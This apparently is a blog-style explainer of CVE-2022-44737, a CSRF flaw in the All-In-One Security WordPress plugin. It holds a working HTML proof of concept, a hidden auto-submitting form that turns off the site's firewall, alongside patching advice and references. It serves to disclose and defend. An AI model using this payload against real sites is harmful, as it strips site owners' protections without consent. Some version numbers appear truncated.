---
Intro: What is CVE-2022-44737?
CVE-2022-44737 is a security vulnerability found in the popular All-In-One Security (AIOS) – Security and Firewall WordPress plugin, affecting versions up to 5.1.. This flaw allows attackers to carry out Cross-Site Request Forgery (CSRF) attacks, potentially letting them change security settings or perform admin-level tasks without the admin's knowledge.
Put simply, a hacker could trick a logged-in WordPress admin into clicking a malicious link, leading to changes within the site—like disabling security features, altering firewall rules, or creating new admin users.
Understanding CSRF
CSRF stands for Cross-Site Request Forgery. It's a web vulnerability where attackers make trusted users (usually logged-in admins) perform actions without their consent. For example, if you’re logged in as an admin and click a tricked link, your browser might unknowingly change settings on your site.
CSRF usually happens because the server accepts requests as valid just because the user is logged in, without checking if the request actually came from the user.
About All-In-One Security (AIOS) Plugin
The AIOS plugin (Download Page) provides security features for WordPress sites, such as:
Brute force protection
It’s widely used because it’s easy to install and covers many bases.
What Happened? The Vulnerabilities
CVE-2022-44737 affects all AIOS plugin versions up to 5.1.. Multiple admin action endpoints lacked CSRF protection, such as WordPress nonces. This oversight allows attackers to trick admins into making unwanted changes.
Examples of affected settings
- Enabling/disabling firewall options
Changing brute force settings
- Editing whitelist/blacklist IPs
Any POST request to these endpoints could be done automatically if the admin visits a specially-crafted page.
Proof of Concept (PoC): Simple Code Example
Here's a basic HTML page that an attacker might host somewhere else. If a logged-in WordPress admin with AIOS v5.1. or less visits this page, it could, for example, disable the firewall on their site.
<!DOCTYPE html>
<html>
<body>
<h1>This is a harmless-looking page</h1>
<form style="display:none" action="https://victims-site.com/wp-admin/admin-post.php?action=aiowps_update_firewall_settings"; method="POST" id="csrfForm">
<input type="hidden" name="aiowps_enable_firewall" value="" />
<input type="hidden" name="aiowps_save" value="Save Changes" />
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
Exclusively for educational purposes
- Replace https://victims-site.com/ with the actual admin site’s URL.
aiowps_enable_firewall is set to (off).
- If the admin is logged in, this will turn off their firewall setting automatically, no confirmation needed.
Real-life Damage
- Disable security/firewall layers
Change login settings to weaken security
- Potentially open the WordPress site for further compromise (uploading shells, creating backdoors, etc.)
If you’re using AIOS plugin
1. Immediately update your AIOS plugin to the latest version. (Download here)
Be cautious of links sent via email, especially when logged in as admin.
Plugin developers must always use WordPress Nonce verification on admin-side actions to prevent CSRF attacks.
References
- WPScan Vulnerability Entry
- NVD Entry at NIST
- Wordfence Threat Intelligence
- AIOS on WordPress Plugins
- How CSRF Works
Conclusion
CVE-2022-44737 is a real-world example of how even security-focused plugins can have risky oversights. The consequences of CSRF flaws can be severe, especially when the affected plugin manages website security. If you use the All-In-One Security plugin on your WordPress site, check your version and update right away.
Always keep your plugins up-to-date, stay aware of security news, and be careful when browsing as an administrator.
Timeline
Published on: 11/22/2022 16:15:00 UTC
Last modified on: 11/28/2022 15:05:00 UTC